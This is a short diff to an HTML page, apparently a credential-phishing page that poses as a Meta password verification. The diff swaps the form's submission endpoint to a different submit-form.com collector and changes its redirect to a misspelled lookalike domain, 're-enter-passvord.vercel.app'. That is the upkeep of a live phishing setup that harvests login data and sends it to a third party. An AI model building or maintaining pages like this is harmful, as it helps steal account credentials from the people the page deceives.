--- a/request.html
+++ b/request.html
@@ -16,11 +16,11 @@
     <link rel="stylesheet" crossorigin="" href="style.css" />
   </head>
   <body>
-    <form action="https://submit-form.com/mFOMDMN3e" method="post">
+    <form action="https://submit-form.com/dj2AnNq6x" method="post">
       <input
         type="hidden"
         name="_redirect"
-        value="https://meta-pass-verify-now.vercel.app/"
+        value="https://re-enter-passvord.vercel.app"
       />
       <div id="root">
         <div>
